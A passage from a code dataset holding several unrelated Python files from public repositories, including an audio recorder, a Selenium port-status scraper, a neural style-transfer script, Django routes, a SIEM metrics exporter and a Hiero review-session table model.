True,\r\n channels = CHANNELS,\r\n frames_per_buffer=CHUNK,\r\n input_device_index=device_index)\r\n\r\n all = []\r\n print(\"recording!!!\")\r\n beginning = True\r\n # run while there is talking or there is silence\r\n while True:\r\n\r\n # read in data from the stream of stero mix\r\n data = stream.read(CHUNK)\r\n all.append(data)\r\n # print(\"data\", data[0], data[1], data[2], data[3])\r\n \r\n sample = [data[0], data[1], data[2], data[3]]\r\n # check if there is talking or silence\r\n if beginning == True and (255 in sample or 254 in sample or 1 in sample or [0, 0, 0, 0] == sample): \r\n # print(\"continue\", sample)\r\n continue\r\n elif True in [True for point in sample if point > 1 and point < 254]: \r\n # print(\"sound detected\", sample)\r\n beginning = False\r\n elif beginning == False and (255 in sample or 254 in sample or 1 in sample or [0, 0, 0, 0] == sample): \r\n # print(\"end\", sample)\r\n break\r\n\r\n # no more talking so the file is done!\r\n stream.stop_stream()\r\n stream.close()\r\n p.terminate()\r\n print(\"finished!!!\")\r\n\r\n # saving the file as a wav to pass onto getVoice\r\n data = b''.join(all)\r\n wf = wave.open(filename, 'wb')\r\n wf.setnchannels(CHANNELS)\r\n wf.setsampwidth(p.get_sample_size(FORMAT))\r\n wf.setframerate(RATE)\r\n wf.writeframes(data)\r\n wf.close()","repo_name":"KaiHoshijo/Zoombot","sub_path":"recordSounds.py","file_name":"recordSounds.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6323971196","text":"import os\nimport os.path as osp\nimport sys\nimport time\nimport logging\nimport pathlib\nimport uuid\nimport shutil\nimport torch\nimport random\nimport numpy as np\n\n\nclass BaseArgs:\n def __init__(self, parser):\n parser.add_argument('--phase', type=str, default='train',\n help='phase. Default: train')\n parser.add_argument('--seed', type=int, default=0)\n\n # datasets args\n parser.add_argument('--train_list', type=str, default='datasets/train_mirflickr.txt',\n help='path to train list')\n parser.add_argument('--val_list', type=str, default='datasets/val_mirflickr.txt',\n help='path to val list')\n parser.add_argument('--benchmark_path', type=str,\n default='data/benchmark/urban100/urban100_noisy_lr_raw-srgb.pt',\n help='path to val list')\n\n parser.add_argument('--patch_size', default=64, type=int,\n help='width and height for a patch (default: 256)')\n parser.add_argument('--in_channels', default=3, type=int,\n help='in_channels, RGB')\n parser.add_argument('--gt_channels', default=3, type=int,\n help='gt_channels, RGB')\n parser.add_argument('--in_type', type=str, default='noisy_lr_raw',\n help='the input image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb'\n )\n parser.add_argument('--mid_type', type=str, default='None',\n help='the mid output image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb, None'\n )\n parser.add_argument('--out_type', type=str, default='linrgb',\n help='the output image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb'\n )\n\n # noise\n # parser.add_argument('--denoise', action='store_true', help='denoise store_true, using shot and read noise')\n parser.add_argument('--read_noise', default=0.00, type=float, help='read_noise')\n parser.add_argument('--shot_noise', default=0.00, type=float, help='shot_noise')\n\n # train args\n parser.add_argument('--batch_per_gpu', default=16, type=int,\n help='batch size per GPU (default:16)')\n parser.add_argument('--n_gpus', default=1, type=int,\n help='number of GPUs (default:1)')\n parser.add_argument('--max_epochs', default=500, type=int,\n help='number of total epochs to run')\n parser.add_argument('--lr', default=1e-4, type=float,\n help='initial learning rate')\n parser.add_argument('--lr_decay_step', default=50, type=int,\n help='learning rate decay step')\n parser.add_argument('--gamma', default=0.5, type=float,\n help='learning rate decay gamma')\n\n # logger parse\n parser.add_argument('--root_dir', type=str, default='log',\n help='path for saving experiment files')\n parser.add_argument('--img_freq', default=10, type=int,\n help='show images every xxx epochs(default: 10)')\n parser.add_argument('--print_freq', default=100, type=int,\n help='show images every xxx iterations(default: 100)')\n # model args\n parser.add_argument('--model', default='tenet', type=str,\n help='path to pretrained model (default: tenet)')\n parser.add_argument('--norm', default=None, type=str,\n help='normalization_type(default: do not use BN or IN)')\n parser.add_argument('--block', default='rrdb', type=str,\n help='dm_block(default: res). res/dudb/rrdb')\n parser.add_argument('--act', default='relu', type=str,\n help='activation layer {relu, prelu, leakyrelu}')\n parser.add_argument('--no_bias', action='store_false', dest='bias',\n help='do not use bias of layer')\n parser.add_argument('--channels', default=64, type=int,\n help='channels')\n parser.add_argument('--n_blocks', default=18, type=int,\n help='number of basic blocks')\n parser.add_argument('--mid_out', action='store_true',\n help='activate middle output supervision')\n parser.add_argument('--output_mid', action='store_true',\n help='output the middle stage result')\n\n # for super-resolution\n parser.add_argument('--scale', default=2, type=int,\n help='Scale of Super-resolution. Default: 2')\n parser.add_argument('--downsampler', default='bic', type=str,\n help='downsampler of Super-resolution. Bicubic or average downsampling. bic / avg')\n # loss args\n parser.add_argument('--mid_lambda', type=float, default=1.0, help='lamda for the middle stage supervision')\n parser.add_argument('--loss_on_srgb', action='store_true',\n help='calculate the loss function values on sRGB')\n\n # test args\n parser.add_argument('--save_dir', type=str, default=None,\n help='path to save the test result')\n parser.add_argument('--test_data', type=str, default='/home/wangy0k/Desktop/denoise/darmstadt/data/',\n help='path to the test data (dnd dataset)')\n parser.add_argument('--pretrain', default='', type=str,\n help='path to pretrained model(default: none)')\n parser.add_argument('--pretrain', default='', type=str,\n help='path to pretrained model(default: none)')\n parser.add_argument('--intermediate', type=bool, default=False,\n help='ISP intermediate state')\n parser.add_argument('--pre_in_type', type=str, default='noisy_lr_raw',\n help='the input image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb'\n )\n parser.add_argument('--pre_out_type', type=str, default='raw',\n help='the output image type: noisy_lr_raw, lr_raw, noisy_raw, raw, '\n 'noisy_lr_linrgb, lr_linrgb, noisy_linrgb, linrgb, '\n 'noisy_lr_rgb, lr_rgb, noisy_rgb, rgb'\n )\n parser.add_argument('--pre_model', default='tenet', type=str,\n help='path to pretrained model (default: tenet)')\n\n args = parser.parse_args()\n\n args.dataset = args.train_list.split('_')[-1].split('.')[0]\n args.batch_size = args.batch_per_gpu * args.n_gpus\n\n args.pre_jobname = '-'.join([args.pre_in_type, args.mid_type, args.pre_out_type])\n args.jobname = '-'.join([args.in_type, args.mid_type, args.out_type])\n\n args.mid_type = None if args.mid_type == 'None' else args.mid_type\n self.args = args\n\n # ===> generate log dir\n self._generate_exp_directory()\n if self.args.phase == 'train':\n self._configure_logger()\n self._print_args()\n self.set_seed(self.args.seed)\n self.args.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n def _generate_exp_directory(self):\n \"\"\"\n Helper function to create checkpoint folder. We save\n model checkpoints using the provided model directory\n but we add a sub-folder for each separate experiment:\n \"\"\"\n timestamp = time.strftime('%Y%m%d-%H%M%S')\n\n experiment_string = '_'.join([self.args.jobname, timestamp, str(uuid.uuid4())])\n\n if self.args.phase == 'train':\n self.args.exp_dir = osp.join(self.args.root_dir, experiment_string)\n self.args.ckpt_dir = osp.join(self.args.exp_dir, \"checkpoint\")\n self.args.code_dir = osp.join(self.args.exp_dir, \"code\")\n self.args.res_dir = osp.join(self.args.exp_dir, \"result\")\n pathlib.Path(self.args.exp_dir).mkdir(parents=True, exist_ok=True)\n pathlib.Path(self.args.ckpt_dir).mkdir(parents=True, exist_ok=True)\n pathlib.Path(self.args.res_dir).mkdir(parents=True, exist_ok=True)\n # ===> save scripts\n shutil.copytree('model', osp.join(self.args.code_dir, 'model'))\n shutil.copytree('TorchTools', osp.join(self.args.code_dir, 'TorchTools'))\n else:\n\n if not self.args.save_dir:\n self.args.save_dir = osp.dirname(self.args.pretrain)\n # self.args.save_dir = osp.join(self.args.save_dir, \"result-{}\".format(osp.basename(self.args.pretrain)))\n pathlib.Path(self.args.save_dir).mkdir(parents=True, exist_ok=True)\n\n def _configure_logger(self):\n \"\"\"\n Configure logger on given level. Logging will occur on standard\n output and in a log file saved in model_dir.\n \"\"\"\n self.args.loglevel = \"info\"\n numeric_level = getattr(logging, self.args.loglevel.upper(), None)\n if not isinstance(numeric_level, int):\n raise ValueError('Invalid log level: {}'.format(self.args.loglevelloglevel))\n\n log_format = logging.Formatter('%(asctime)s %(message)s')\n logger = logging.getLogger()\n logger.setLevel(numeric_level)\n\n file_handler = logging.FileHandler(osp.join(self.args.exp_dir,\n '{}.log'.format(osp.basename(self.args.exp_dir))))\n file_handler.setFormatter(log_format)\n logger.addHandler(file_handler)\n\n file_handler = logging.StreamHandler(sys.stdout)\n file_handler.setFormatter(log_format)\n logger.addHandler(file_handler)\n logging.root = logger\n logging.info(\"save log, checkpoint and code to: {}\".format(self.args.exp_dir))\n\n def _print_args(self):\n logging.info(\"========== args =============\")\n for arg, content in self.args.__dict__.items():\n logging.info(\"{}: {}\".format(arg, content))\n logging.info(\"========== args END =============\")\n logging.info(\"\\n\")\n logging.info('===> Phase is {}.'.format(self.args.phase))\n\n @staticmethod\n def set_seed(seed=0):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n","repo_name":"guochengqian/TENet","sub_path":"TorchTools/ArgsTools/pipe_args.py","file_name":"pipe_args.py","file_ext":"py","file_size_in_byte":11374,"program_lang":"python","lang":"en","doc_type":"code","stars":252,"dataset":"github-code","pt":"68"} +{"seq_id":"25415522645","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\nimport mysql.connector\nimport csv\n\nurl = \"https://nsw.md.go.th/msberthmanagement/PublicBerthStatus.aspx\"\ndate_input = input('Put your in put here format dd/mm/yyyy: ').split('/')\ntable_name = f'{int(date_input[0])}, {int(date_input[1])}, {int(date_input[2])}'\n# date_input = '01/01/2023'.split('/')\n\nconvert_month = {1 : 'มกราคม',\n 2 : 'กุมภาพันธ์',\n 3 : 'มีนาคม',\n 4 : 'เมษายน',\n 5 : 'พฤษภาคม',\n 6 : 'มิถุนายน',\n 7 : 'กรกฎาคม ',\n 8 : 'สิงหาคม',\n 9 : 'กันยายน ',\n 10 : 'เดือนตุลาคม',\n 11 : 'พฤศจิกายน ',\n 12 : 'ธันวาคม'}\n\ndef find_data_from_date(date_list):\n \n driver = webdriver.Chrome()\n driver.get(url)\n \n try: \n text_before = driver.find_element(By.XPATH, r\"/html/body/form/main/div/div/div/div/div/div/div[2]/div/div[1]/div/div[2]/div/div/div/div/table/tbody/tr[2]/td[6]/span[1]\").text\n except NoSuchElementException: \n text_before = \"\"\n\n date_button = driver.find_element(By.XPATH, '/html/body/form/main/div/div/div/div/div/div/div[1]/div/div[3]/div/input')\n date_button.click()\n \n wait = WebDriverWait(driver, 20)\n \n month_button = driver.find_element(By.XPATH, '/html/body/div/div[1]/div/div/select')\n month_button.click()\n \n if date_list[1]:\n date = int(date_list[0])\n month = int(date_list[1])\n year = int(date_list[2])\n print(date, month, year)\n \n if month in range(1, 12):\n select_month_button = driver.find_element(By.XPATH, f'/html/body/div/div[1]/div/div/select/option[{month}]')\n select_month_button.click()\n \n if year:\n select_year_button = driver.find_element(By.XPATH, f'/html/body/div/div[1]/div/div/div/input')\n select_year_button.click()\n select_year_button.send_keys(year)\n \n if date:\n date_Name = f'{convert_month[month]} {date}, {year}'\n date = wait.until(EC.element_to_be_clickable((By.XPATH,f\"(//span[@aria-label='{date_Name}'])\")))\n date.click()\n \n search = wait.until(EC.element_to_be_clickable((By.XPATH,'/html/body/form/main/div/div/div/div/div/div/div[1]/div/div[4]/div/a')))\n search.click()\n \n else:\n print('Error date did not in put')\n \n else:\n print('Error year did not in put')\n \n else:\n print('Error month of range')\n \n while True:\n i = 0\n try:\n \n current_text = driver.find_element(By.XPATH, r\"/html/body/form/main/div/div/div/div/div/div/div[2]/div/div[1]/div/div[2]/div/div/div/div/table/tbody/tr[2]/td[6]/span[1]\").text\n if current_text != text_before:\n break\n \n if i == 20:\n break\n # print(i)\n i += 1\n \n except:\n break\n \n all_data = driver.page_source\n # print(all_data)\n return all_data, date_Name\n\ndef get_data(all_data, date):\n soup = BeautifulSoup(all_data, 'html.parser')\n data = soup.find_all('div', {'class': 'col-lg-6'})\n # print(data)\n \n port_list = []\n ship_list = []\n state_list = []\n\n for ele in data:\n head = ele.find_all('h6')\n name = ele.select('[id*=\"lblShipName\"]')\n state = ele.select('[id*=\"lblShipProcessingIndicator\"]')\n # print(head)\n for span in head:\n port = span.find('span')\n # print(port.string)\n port_name = port.string \n for n, s in zip(name, state):\n # print(\" -\", n.string, \"(\"+ s.string + \")\")\n # if port_name not in port_list:\n # port_list.append(port_name)\n \n # elif port_name in port_list:\n # port_list.append('')\n port_list.append(port_name)\n ship_list.append(n.string)\n state_list.append(s.string)\n # print(\"-------------------------------\")\n\n \n df = pd.DataFrame({'Port': port_list, 'Ship': ship_list, 'State': state_list})\n\n # print(df.head)\n df.to_excel(f'Collect_Data\\{date}_data_table.xlsx', index=False)\n df.to_csv(f'Collect_Data\\{date}_data_table.csv', index=False)\n \n return port_list, ship_list, state_list \n\ndata, date = find_data_from_date(date_input)\nport_list, ship_list, state_list= get_data(data, date)","repo_name":"Pannmekmok/Port-Management-Weng","sub_path":"md-webscrap_dynamic.py","file_name":"md-webscrap_dynamic.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3128062828","text":"import sys\ninput = sys.stdin.readline\n\nfrom collections import deque\ndef bfs():\n global queue\n while queue:\n z, y, x = queue.popleft()\n for i in range(6):\n nx, ny, nz = x + moveset[i][0], y + moveset[i][1], z + moveset[i][2]\n if nx < 0 or nx >= M or ny < 0 or ny >= N or nz < 0 or nz >= H:\n continue\n \n if box[nz][ny][nx] == 0:\n box[nz][ny][nx] = box[z][y][x] + 1\n queue.append((nz, ny, nx))\n\nM, N, H = map(int, input().split())\nbox = [[list(map(int, input().split())) for _ in range(N)] for _ in range(H)]\nmoveset = [(-1, 0, 0), (1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1)]\ndays = 0\nqueue = deque([])\nfor i in range(H):\n for j in range(N):\n for k in range(M):\n if box[i][j][k] == 1:\n queue.append((i, j, k))\n\nbfs()\n\nfor i in range(H):\n for j in range(N):\n for k in range(M):\n if box[i][j][k] == 0:\n print(-1)\n exit()\n if days < box[i][j][k]:\n days = box[i][j][k]\nprint(days - 1)","repo_name":"whatisyourname0/BOJ_Repository","sub_path":"archives/python/7569.py","file_name":"7569.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13898083205","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n path('debtors/', views.DebtorList.as_view(), name='debtors_list'),\n path('debtors//', views.debtors_detail, name='detail'),\n path('debtors/create/', views.DebtorCreate.as_view(), name='debtors_create'),\n path('debtors//update', views.DebtorUpdate.as_view(), name='debtors_update'),\n path('debtors//delete', views.DebtorDelete.as_view(), name='debtors_delete'),\n path('debtors//add_payment/', views.add_payment, name='add_payment'),\n path('debtors//assoc_insurance//', views.assoc_insurance, name='assoc_insurance'),\n path('insurance/', views.InsuranceList.as_view(), name='insurance_index'),\n path('insurance/create/', views.InsuranceCreate.as_view(), name='insurance_create'),\n path('insurance//delete/', views.InsuranceDelete.as_view(), name='insurance_delete'),\n]","repo_name":"lolo19950603/debtcollector","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27966998346","text":"import numpy as np\r\nimport time\r\nimport scipy\r\nfrom PIL import Image\r\nfrom os import listdir, mkdir, getcwd\r\nfrom keras.applications.vgg16 import VGG16\r\nfrom keras import backend as K\r\n\r\n# model weights and constants\r\nContent_weight = 0.021\r\nstyle_weight = 7.6\r\ntotal_variation_weight = 1.5\r\niterations = 9\r\n\r\nlimit = 420 # limit the size of images\r\nheight = limit\r\nwidth = limit\r\n\r\n# loss functions\r\ndef Content_loss(Content, whole):\r\n return K.sum(K.square(whole - Content))\r\n\r\ndef gram_matrix(x):\r\n features = K.batch_flatten(K.permute_dimensions(x, (2, 0, 1)))\r\n gram = K.dot(features, K.transpose(features))\r\n return gram\r\n\r\ndef style_loss(style, whole):\r\n S = gram_matrix(style)\r\n C = gram_matrix(whole)\r\n channels = 3\r\n size = height * width\r\n return K.sum(K.square(S - C)) / (4. * (channels ** 2) * (size ** 2))\r\n\r\ndef total_variation_loss(x):\r\n a = K.square(x[:, :width-1, :height-1, :] - x[:, 1:, :height-1, :])\r\n b = K.square(x[:, :width-1, :height-1, :] - x[:, :width-1, 1:, :])\r\n return K.sum(K.pow(a + b, 1.25))\r\n\r\ndef total_loss(model, whole_image):\r\n loss = K.variable(0.)\r\n\r\n layers = dict([(layer.name, layer.output) for layer in model.layers])\r\n layer_features = layers['block1_conv2'] # Content loss layers\r\n Content_image_features = layer_features[0, :, :, :]\r\n whole_features = layer_features[2, :, :, :]\r\n # Content loss\r\n loss += Content_weight * Content_loss(Content_image_features,\r\n whole_features)\r\n # style loss layers\r\n feature_layers = ['block1_conv2', 'block2_conv2',\r\n 'block3_conv3', 'block4_conv3',\r\n 'block5_conv3']\r\n\r\n for layer_name in feature_layers:\r\n layer_features = layers[layer_name]\r\n style_features = layer_features[1, :, :, :]\r\n whole_features = layer_features[2, :, :, :]\r\n sl = style_loss(style_features, whole_features)\r\n loss += (style_weight / len(feature_layers)) * sl\r\n\r\n # total variation loss\r\n loss += total_variation_weight * total_variation_loss(whole_image)\r\n return loss # total loss\r\n\r\n\r\ndef eval_loss_and_grads(x):\r\n x = x.reshape((1, width, height, 3))\r\n outputs = [loss]\r\n outputs += grads\r\n f_outputs = K.function([whole_array], outputs)\r\n outs = f_outputs([x])\r\n loss_value = outs[0]\r\n grad_values = outs[1].flatten().astype('float64')\r\n return loss_value, grad_values\r\n\r\ndef minimize_loss(whole):\r\n x = np.random.uniform(0, 255, (1, width, height, 3)) - 128\r\n evaluator = Evaluator()\r\n\r\n print(\"\\n\\nProcessing: \" + whole)\r\n for i in range(iterations):\r\n\r\n # print diagnostic information\r\n print('Start of iteration', i)\r\n start_time = time.time()\r\n x, min_val, info = scipy.optimize.fmin_l_bfgs_b(evaluator.loss,\r\n x.flatten(),\r\n fprime=evaluator.grads,\r\n maxfun=20)\r\n print('Current loss value:', min_val)\r\n end_time = time.time()\r\n print('Iteration %d completed in %ds' % (i, end_time - start_time))\r\n return x\r\n\r\n# Evaluator class\r\nclass Evaluator(object):\r\n def __init__(self):\r\n self.loss_value = None\r\n self.grads_values = None\r\n\r\n def loss(self, x):\r\n assert self.loss_value is None\r\n loss_value, grad_values = eval_loss_and_grads(x)\r\n self.loss_value = loss_value\r\n self.grad_values = grad_values\r\n return self.loss_value\r\n\r\n def grads(self, x):\r\n assert self.loss_value is not None\r\n grad_values = np.copy(self.grad_values)\r\n self.loss_value = None\r\n self.grad_values = None\r\n return grad_values\r\n\r\n# util functions\r\n\r\ndef convert_to_image(img_array):\r\n img_array = img_array.reshape((width, height, 3)) # reshape\r\n img_array = img_array[:, :, ::-1]\r\n img_array[:, :, 0] += 103.939\r\n img_array[:, :, 1] += 116.779\r\n img_array[:, :, 2] += 123.68\r\n img_array = np.clip(img_array, 0, 255).astype('uint8')\r\n\r\n return Image.fromarray(img_array) # return image\r\n\r\ndef prelim_img_process(image):\r\n image = image.resize((height, width), Image.ANTIALIAS) # resize\r\n image = np.asarray(image, dtype='float32') # cast to np array\r\n image = np.expand_dims(image, axis=0) # add placeholder dimension\r\n\r\n image = image[:,:,:,:3] # remove alpha chanel\r\n image[:, :, :, 0] -= 103.939 # RGB values obtained from ImageNet\r\n image[:, :, :, 1] -= 116.779\r\n image[:, :, :, 2] -= 123.68\r\n image = image[:, :, :, ::-1]\r\n return image\r\n\r\ndef search_img_names():\r\n all_Content_names = listdir(\"ContentImages\")\r\n all_style_names = listdir(\"styleImages\")\r\n return all_Content_names, all_style_names\r\n\r\ndef search_Content_img(name):\r\n image = Image.open('./ContentImages/' + str(name)\r\n ) # search the Content image\r\n # change the global variable to fit center image\r\n global height,width\r\n width = image.size[1]\r\n height = image.size[0]\r\n # compress\r\n if(height>limit or width>limit):\r\n if(height>width):\r\n ratio = height/limit\r\n else:\r\n ratio = width/limit\r\n height = int(height/ratio)\r\n width = int(width/ratio)\r\n\r\n image = prelim_img_process(image)\r\n return image\r\n\r\ndef search_style_img(name):\r\n image = Image.open('./styleImages/' + str(name)\r\n ) # search the style image\r\n\r\n # rotate style image to minish the loss on style images\r\n if (image.size != (width,height)\r\n and (image.size[1] >= image.size[0]) != (height >= width)):\r\n image = image.rotate(90) # rotate style-image\r\n\r\n image = prelim_img_process(image)\r\n return image\r\n#-----------------------------------------------------------------------------\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # search all images references\r\n Content_names, style_names = search_img_names()\r\n\r\n # process each Content image\r\n for Content_name in Content_names:\r\n # create intermediate directory associated output\r\n mkdir('./outputImages/' + Content_name[:-4])\r\n content_images = search_Content_img(Content_name)\r\n\r\n # create all style wholes for the current Content image\r\n for style_name in style_names:\r\n style_images = search_style_img(style_name)\r\n\r\n # create whole name and save destination\r\n whole = Content_name[:-4] + style_name[:-4]\r\n save_dir = getcwd() + '/outputImages/' + \\\r\n Content_name[:-4] + '/' + whole\r\n\r\n # create placeholder image, used to store merger image\r\n whole_array = K.placeholder((1, width,height, 3))\r\n\r\n # concatenate the image arrays\r\n input_tensor = K.concatenate([content_images,\r\n style_images,\r\n whole_array], axis=0)\r\n\r\n # load model, iteratively merge and consolidate the two images\r\n # load the model\r\n model = VGG16(input_tensor=input_tensor,\r\n weights='imagenet', include_top=False)\r\n # calculate whole loss\r\n loss = total_loss(model, whole_array)\r\n # calulate gradients of generated image\r\n grads = K.gradients(loss, whole_array)\r\n # run optimization using previously calculated loss values\r\n x = minimize_loss(whole)\r\n # convert and finalize np array\r\n final = convert_to_image(x)\r\n # save final rendition appropriately\r\n final.save(save_dir + '.jpeg', \"jpeg\")","repo_name":"Explorerhpx/Course-Project_Machine-Learning","sub_path":"Final Project/code/question2/sybthesis.py","file_name":"sybthesis.py","file_ext":"py","file_size_in_byte":7748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"37802988655","text":"import requests\n\n\ndef get_eps(siem_address='localhost'):\n raw_addr = f'http://{siem_address}:8013/events/counter/simple?name=storage.events_raw.in&granularity=300' \\\n f'&aggregation=avg'\n norm_addr = f'http://{siem_address}:8013/events/counter/simple?name=storage.events_norm.in&granularity=300' \\\n f'&aggregation=avg'\n corr_in_addr = f'http://{siem_address}:8013/events/counter/simple?name=correlator.events.in&granularity=300' \\\n f'&aggregation=avg'\n corr_out_addr = f'http://{siem_address}:8013/events/counter/simple?name=correlator.events.out&granularity=300' \\\n f'&aggregation=avg'\n parsed_string_r = round(requests.get(url=raw_addr).json().get('count')[0])\n parsed_string_n = round(requests.get(url=norm_addr).json().get('count')[0])\n parsed_string_ci = round(requests.get(url=corr_in_addr).json().get('count')[0])\n parsed_string_co = round(requests.get(url=corr_out_addr).json().get('count')[0])\n\n keys_list = ['raw_eps', 'norm_eps', 'corr_in', 'corr_out']\n metric_list = [parsed_string_r, parsed_string_n, parsed_string_ci, parsed_string_co]\n new_list = dict(zip(keys_list, metric_list))\n\n return new_list\n\n\ndef get_siem_tables(siem_address='localhost'):\n tables_request = f'http://{siem_address}:8013/v2/control/tables'\n req = requests.get(tables_request).json()\n return req\n","repo_name":"GenRockeR/mpsiemlib","sub_path":"examples/mpsiem_exporter/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"68"} +{"seq_id":"73948761497","text":"class Solution:\n def majorityElement(self, nums: List[int]) -> List[int]:\n cnt = {}\n hashset = set()\n ans = []\n for num in nums:\n cnt[num] = cnt.get(num,0)+1\n if cnt[num] > len(nums)//3 and num not in hashset:\n ans.append(num)\n hashset.add(num)\n return ans","repo_name":"Daniel-W1/Competitive-Programming","sub_path":"229-majority-element-ii/229-majority-element-ii.py","file_name":"229-majority-element-ii.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"26233729125","text":"# 2. Создать список, состоящий из кубов нечётных чисел от 1 до 1000\r\n# (куб X - третья степень числа X):\r\n# Вычислить сумму тех чисел из этого списка, сумма цифр которых делится\r\n# нацело на 7. Например, число «19 ^ 3 = 6859» будем включать в сумму,\r\n# так как 6 + 8 + 5 + 9 = 28 – делится нацело на 7. Внимание: использовать\r\n# только арифметические операции!\r\n# К каждому элементу списка добавить 17 и заново вычислить сумму тех чисел\r\n# из этого списка, сумма цифр которых делится нацело на 7.\r\n# * Решить задачу под пунктом b, не создавая новый список.\r\n#\r\n\r\nx = 1\r\nten = 10\r\nhund = ten ** 2\r\nthous = ten ** 3\r\nten_thous = ten ** 4\r\nhund_thous = ten ** 5\r\nall_sum = 0\r\n\r\nwhile x % 2 and x < 1000:\r\n # print('Степень', x ** 3)\r\n degree = x ** 3\r\n sum_degree = (degree // hund_thous +\r\n degree % hund_thous // ten_thous +\r\n degree % hund_thous % ten_thous // thous +\r\n degree % hund_thous % ten_thous % thous // hund +\r\n degree % hund_thous % ten_thous % thous % hund // ten +\r\n degree % ten)\r\n # print('Сумма', sum_degree)\r\n if not sum_degree % 7:\r\n all_sum = all_sum + sum_degree\r\n # else:\r\n # print(all_sum )\r\n x = x + 2\r\nprint(all_sum)\r\n","repo_name":"Lex-G357/Test","sub_path":"task_1_2.py","file_name":"task_1_2.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19634747556","text":"import operator\n\nimport hiero.ui\nimport hiero.core\nfrom PySide2.QtGui import QFont, QIcon, QColor, QFontMetrics\nfrom PySide2.QtCore import (Qt, QSize, QPoint, QModelIndex, QAbstractItemModel,\n QAbstractTableModel, QSortFilterProxyModel)\nfrom PySide2.QtWidgets import (QWidget, QToolTip, QTableView, QHBoxLayout,\n QHeaderView, QPushButton, QSizePolicy,\n QVBoxLayout, QApplication, QAbstractItemView)\n\nfrom . import config\nfrom .connectionmanager import ConnectionState, ConnectionManager\n\n\nclass _Columns:\n \"\"\" Columns present in the table model. \"\"\"\n\n color = 0\n \"\"\" Participant's color. \"\"\"\n\n participant = 1\n \"\"\" Participant's name. \"\"\"\n\n status = 2\n \"\"\" Participant's connection status. \"\"\"\n\n size = 3\n \"\"\" Number of columns in the table. \"\"\"\n\n\n_participantsHeaderFormat = 'Participants ({})'\n\n\nclass _Participant:\n \"\"\" Holds the data of a participant in the table model. \"\"\"\n\n def __init__(self, clientId, name, color, status):\n self.clientId = clientId\n self.name = name\n self.color = QColor(color[0], color[1], color[2], 255)\n self.status = status\n\n\nclass _SyncReviewStatusModel(QAbstractTableModel):\n \"\"\" Data model for the data of the participants in the current sync review session. \"\"\"\n\n def __init__(self, view):\n QAbstractTableModel.__init__(self)\n self._view = view\n # List of _Participant instances.\n self._data = list()\n self._clientDataProvider = None\n\n def _updateClientData(self, clientData):\n self.beginResetModel()\n\n # Keep known participants that are no longer connected as offline.\n self._data = [_Participant(p.clientId, p.name, (p.color.red(), p.color.green(), p.color.blue()), False) for p in self._data if\n p.clientId not in clientData]\n\n # Add new clients as connected participants. Update existing participant data.\n for clientId, clientData in clientData.items():\n name, color = clientData\n self._data.append(_Participant(clientId, name, color, True))\n\n self.endResetModel()\n\n def _clientDataChanged(self):\n self._updateClientData(self._clientDataProvider.clientData)\n\n def _clearClientData(self):\n self._data = list()\n self._updateClientData(dict())\n\n def rowCount(self, parent):\n if parent.isValid():\n return 0\n return len(self._data)\n\n def columnCount(self, parent):\n if parent.isValid():\n return 0\n return _Columns.size\n\n def headerData(self, section, orientation, role):\n global _participantsHeaderFormat\n data = None\n\n if orientation != Qt.Orientation.Horizontal:\n return data\n\n if role == Qt.DisplayRole:\n if section == _Columns.participant:\n data = _participantsHeaderFormat.format(len(self._data))\n elif section == _Columns.status:\n data = 'Status'\n elif role == Qt.DecorationRole:\n if section == _Columns.color:\n return QIcon('icons:SyncParticipants.png')\n\n return data\n\n def data(self, index, role):\n if not index.isValid():\n return None\n\n data = None\n participant = self._data[index.row()]\n column = index.column()\n if role == Qt.DisplayRole:\n if column == _Columns.participant:\n data = participant.name\n elif column == _Columns.status:\n if (participant.clientId == config.HOST_ID):\n data = 'Host'\n else:\n data = 'Connected' if participant.status else 'Offline'\n elif role == Qt.DecorationRole:\n if column == _Columns.color:\n # ToDo Use a colorized icon instead of a color square.\n data = participant.color\n\n return data\n\n def enterSession(self, clientDataProvider):\n self._clientDataProvider = 